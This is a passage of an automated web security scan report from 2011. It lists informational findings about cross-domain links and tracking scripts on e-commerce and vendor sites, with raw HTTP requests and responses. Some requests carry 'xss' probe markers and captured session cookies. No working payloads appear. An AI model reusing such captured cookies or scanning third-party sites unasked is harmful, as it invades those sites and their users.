Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35920884238154043,0:1)
Content-Length: 3470
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

19.110. http://www.oraclecfo.com/Authentication/Login_w.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Authentication/Login_w.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oraclecfo.com/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==

The response contains the following links to other domains:

http://stats.volume.co.uk/piwik.php?idsite=3
http://www.oracle.com/html/copyright.html
http://www.oracle.com/html/privacy.html
http://www.oracle.com/html/terms.html
http://www.oracle.com/us/corporate/index.htm

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:11:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<p>
   <a href="http://www.oracle.com/us/corporate/index.htm" target="_blank">About Oracle</a>
...[SNIP]...
</a>
   |
   <a href="http://www.oracle.com/html/copyright.html" target="_blank">Legal Notices</a>
   |
   <a href="http://www.oracle.com/html/terms.html" target="_blank">Terms of Use</a>
   |
   <a href="http://www.oracle.com/html/privacy.html" target="_blank">Privacy</a>
...[SNIP]...
<p><img src="http://stats.volume.co.uk/piwik.php?idsite=3" style="border:0" alt="" /></p>
...[SNIP]...

19.111. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Main/Solutions/Solutions_w.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82

The response contains the following links to other domains:

http://stats.volume.co.uk/piwik.php?idsite=3
http://www.oracle.com/html/copyright.html
http://www.oracle.com/html/privacy.html
http://www.oracle.com/html/terms.html
http://www.oracle.com/us/corporate/index.htm

Request

Response

19.112. http://www.rayalab.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w

The response contains the following links to other domains:

http://www.beautypackaging.com/articles/2006/12/contracting-out-beauty.php
http://www.bestskincare.com/
http://www.dermalogica.com/
http://www.dermatologistrx.com/
http://www.diamondbeauty.com/
http://www.essentialdayspa.com/
http://www.google-analytics.com/urchin.js
http://www.joybeauty.com/
http://www.onlineconversion.com/
http://www.rayaspa.com/
http://www.sephora.com/
http://www.skinstore.com/
http://www.timeanddate.com/calendar/
http://www.timeanddate.com/worldclock/full.html
http://www.wunderground.com/US/CA/San_Francisco.html

Request

GET /?gclid=CMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Sat, 19 Mar 2011 16:04:36 GMT
ETag: "152efb-1e857-49ed80d11d5a1"
Accept-Ranges: bytes
Content-Length: 125015
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Raya Cosmetic Manuf
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<li><a href="http://www.onlineconversion.com/" class="rayalab_text">Conversions</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/worldclock/full.html" class="rayalab_text">World Clock</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/calendar/" class="rayalab_text">Calendar</a>
...[SNIP]...
<li><a href="http://www.wunderground.com/US/CA/San_Francisco.html" class="rayalab_text">World Weather</a>
...[SNIP]...
_text">In addition, her one room facial salon became Raya Day Spa, one of the largest 3 story (12,000 ft sq.-1,200 sq.m) and most successful and affordable Day Spa's in Bevery Hills/ Los Angeles area <a href="http://www.rayaspa.com" class="rayalab_text"><u>
...[SNIP]...
<td align="left" height="30px" colspan="2"><a href="http://www.beautypackaging.com/articles/2006/12/contracting-out-beauty.php" style="text-decoration:none"><font color="#000000">
...[SNIP]...
<td class="rayalab_text">RAYA Day Spa <a href="http://www.rayaspa.com" class="rayalab_text"><u>
...[SNIP]...
<td align="center"><a href="http://www.sephora.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.diamondbeauty.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<td align="center"><a href="http://www.dermatologistrx.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.essentialdayspa.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.bestskincare.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<td align="center"><a href="http://www.skinstore.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.joybeauty.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
</a> <a href="http://www.dermalogica.com" target="_blank" class="rayalab_text"><strong>
...[SNIP]...
<li><a href="http://www.onlineconversion.com/" class="rayalab_text">Conversions</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/worldclock/full.html" class="rayalab_text">World Clock</a>
...[SNIP]...
<li><a href="http://www.timeanddate.com/calendar/" class="rayalab_text">Calendar</a>
...[SNIP]...
<li><a href="http://www.wunderground.com/US/CA/San_Francisco.html" class="rayalab_text">World Weather</a>
...[SNIP]...

19.113. http://www.resourcepoint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resourcepoint.net/?string=xss

The response contains the following links to other domains:

http://c41.statcounter.com/3776433/0/f2e27155/1/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.statcounter.com/counter/counter_xhtml.js
http://www.statcounter.com/free_hit_counter.html

Request

GET /?string=xss HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; name=xss

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:04 GMT
Accept-Ranges: bytes
ETag: "0a61544d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:17 GMT
Content-Length: 63953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point . Experts in eCommerce, portal development & content management</title>
<meta http-equiv="Conten
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="460" height="162">
<param name="movie" value="index-ani.swf">
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><a href="http://www.statcounter.com/free_hit_counter.html" target="_blank"><img class="statcounter" src="http://c41.statcounter.com/3776433/0/f2e27155/1/" alt="free page hit counter" ></a>
...[SNIP]...

19.114. http://www.sapient.com/en-us/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/search.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.sapient.com/en-us/search.html?search=xss%20contact%20faq%20phone

The response contains the following links to other domains:

http://fonts.googleapis.com/css?family=Droid+Sans
http://platform.twitter.com/widgets.js
http://sape.client.shareholder.com/
https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:16 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<link rel="icon" href="http://edge.sapient.com/assets/images/favicon.ico"/><link href="http://fonts.googleapis.com/css?family=Droid+Sans" rel="stylesheet" type="text/css" /><link href="http://www.sapient.com/en-us/search.html" rel="canonical" />
...[SNIP]...
<h3>
<a title='Investors' onclick="return true;" href='http://sape.client.shareholder.com/'>Investors </a>
...[SNIP]...
<li class=''><a title='Investors' href='http://sape.client.shareholder.com/'>
Investors
</a>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT"></script>
...[SNIP]...

19.115. http://www.shopify.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://support.myshopify.com/
http://t2.trackalyzer.com/trackalyze.js
http://www.facebook.com/pages/Shopify/20409006880
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1033599327/?label=PChICMOLtgEQ3_Lt7AM&guid=ON&script=0
http://www.twitter.com/shopify
http://www.youtube.com/v/2BBL_L4_y94

Request

GET /?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "30c5dcee90df3e2bd9e086c8942ae167"
X-Rack-Cache: miss, store
X-Content-Digest: 070a65f2e8b29b4bcab54cdf40a2829e64cb6f67
X-Runtime: 1231
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 16931
Date: Tue, 06 Sep 2011 15:32:05 GMT
X-Varnish: 1687907058 1687907055
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<meta
...[SNIP]...
<![endif]-->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://support.myshopify.com/" title="Welcome - Shopify Support"><strong>
...[SNIP]...
<div id="dodovid">
<object type="application/x-shockwave-flash" width="640" height="370" data="http://www.youtube.com/v/2BBL_L4_y94">
<param name="movie" value="http://www.youtube.com/v/2BBL_L4_y94">
...[SNIP]...
<li><a href="http://support.myshopify.com/">Technical Support</a>
...[SNIP]...
</div><a href="http://www.twitter.com/shopify" onclick="pageTracker._setVar('Visit Twitter');">Twitter</a>
...[SNIP]...
</div><a href="http://www.facebook.com/pages/Shopify/20409006880" onclick="pageTracker._setVar('Visit Facebook');">Facebook</a>
...[SNIP]...


<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033599327/?label=PChICMOLtgEQ3_Lt7AM&guid=ON&script=0"/>
</div>
</noscript>

<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

19.116. http://www.tenzing.com/atg-ecommerce-hosting.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/atg-ecommerce-hosting.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC

The response contains the following links to other domains:

http://feeds.feedburner.com/tenzing-saas-ecommerce-hosting
http://t5.trackalyzer.com/trackalyze.js
http://twitter.com/TenzingHosting
http://w.sharethis.com/button/buttons.js
http://www.facebook.com/pages/Tenzing-SaaS-Ecommerce-Hosting/203536313011334
http://www.linkedin.com/company/tenzing-managed-it-services

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 27188
Content-Type: text/html
Set-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/
Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/pages/Tenzing-SaaS-Ecommerce-Hosting/203536313011334" target="_blank">Like Tenzing on Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TenzingHosting" target="_blank">Follow Tenzing on Twitter</a>
...[SNIP]...
<li class="linkedin"><a href="http://www.linkedin.com/company/tenzing-managed-it-services" target="_blank">Tenzing on LinkedIn</a>
...[SNIP]...
<li class="rss"><a href="http://feeds.feedburner.com/tenzing-saas-ecommerce-hosting" target="_blank">View Tenzing's News RSS Feed</a>
...[SNIP]...
<div class="follow-us">
                   <a href="http://twitter.com/TenzingHosting" target="_blank">Follow @TenzingHosting</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/pages/Tenzing-SaaS-Ecommerce-Hosting/203536313011334" target="_blank">Like Tenzing on Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/TenzingHosting" target="_blank">Follow Tenzing on Twitter</a>
...[SNIP]...
<li class="linkedin"><a href="http://www.linkedin.com/company/tenzing-managed-it-services" target="_blank">Tenzing on LinkedIn</a>
...[SNIP]...
<li class="rss"><a href="http://feeds.feedburner.com/tenzing-saas-ecommerce-hosting" target="_blank">View Tenzing's on RSS News Feed</a>
...[SNIP]...

19.117. http://www.volusion.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volusion.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g

The response contains the following links to other domains:

http://a248.e.akamai.net/www.volusion.com/a1/c/styles01.css?8
http://a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js
http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3
http://twitter.com/
http://www.facebook.com/volusion
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1014025859/?label=6N3SCO2Z6QEQg53D4wM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1022594684/?label=HIUjCIS-2wEQ_JzO5wM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1072407790/?label=pHyZCI7nqQEQ7smu_wM&guid=ON&script=0
http://www.icann.org/en/registrars/registrant-rights-responsibilities-en.htm
http://www.linkedin.com/company/volusion
http://www.youtube.com/volusion

Request

GET /?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 30981
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</style>

<link href="//a248.e.akamai.net/www.volusion.com/a1/c/styles01.css?8" type="text/css" rel="stylesheet" media="all" />
<link href="//install.volusion.com/installer/assets/css/DemoOverlay.css" type="text/css" rel="stylesheet" media="all" />
...[SNIP]...
<body id="home" class="home">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>
<a href="http://www.facebook.com/volusion" class="gs_link" rel="external" style="background-position:0 0">Facebook</a>
<a href="http://twitter.com/#!/volusion" class="gs_link" rel="external" style="background-position:0 -50px">twitter</a>
<a href="http://www.linkedin.com/company/volusion" class="gs_link" rel="external" style="background-position:0 -100px">LinkedIn</a>
<a href="http://www.youtube.com/volusion" class="gs_link" rel="external" style="background-position:0 -150px">YouTube</a>
...[SNIP]...
<div id="from_twit">
<a href="http://twitter.com/#!/volusion" id="twit_link" rel="external">Volusion on Twitter</a>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
<li class="f_li"><a href="http://www.icann.org/en/registrars/registrant-rights-responsibilities-en.htm" class="f_a SL">Registrants' Rights</a>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1072407790/?label=pHyZCI7nqQEQ7smu_wM&guid=ON&script=0" />
</div>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1014025859/?label=6N3SCO2Z6QEQg53D4wM&guid=ON&script=0" />
</div>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="//www.googleadservices.com/pagead/conversion/1022594684/?label=HIUjCIS-2wEQ_JzO5wM&guid=ON&script=0" />
</div>
...[SNIP]...

<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3">

...[SNIP]...

19.118. http://www.youtube.com/embed/kPJh9FWuOks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/kPJh9FWuOks

Issue detail

The page was loaded from a URL containing a query string:

http://www.youtube.com/embed/kPJh9FWuOks?rel=0&hd=1

The response contains the following links to other domains:

http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css
http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
http://s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js
http://www.google.com/support/youtube/bin/answer.py?answer=1229982

Request

GET /embed/kPJh9FWuOks?rel=0&hd=1 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18441
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>A Look Inside BigCommerce (We're Hiring!) - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">

</head>
...[SNIP]...
<div id="watch-longform-ad-placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300"></div>
...[SNIP]...
<p>
Get <a href="http://www.google.com/support/youtube/bin/answer.py?answer=1229982">help setting up HTML5 3D</a>
...[SNIP]...
</div>

<img class="html5-watermark html5-stop-propagation html5-icon hid" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark">
<div class="html5-player-chrome html5-stop-propagation">
...[SNIP]...
t-title="Play" data-alt-title="Pause" onclick=";return false;" type="button" class="html5-play-button yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="3" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
tle="Mute" data-alt-title="Unmute" onclick=";return false;" type="button" class="html5-volume-button yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="-1" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
ll screen" onclick=";return false;" type="button" class="html5-fullscreen-button html5-control-right yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="11" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
e="Shrink" onclick=";return false;" type="button" class="html5-expand-button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="10" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
tton-reverse yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="8" role="button" aria-pressed="false" aria-expanded="false" aria-haspopup="true" aria-activedescendant=""><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
urn false;" title="Annotations" type="button" class="html5-annotations-button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="7" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
</span><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""><div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js"></script>
...[SNIP]...

19.119. http://www.znode.com/znode-multifront/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.znode.com
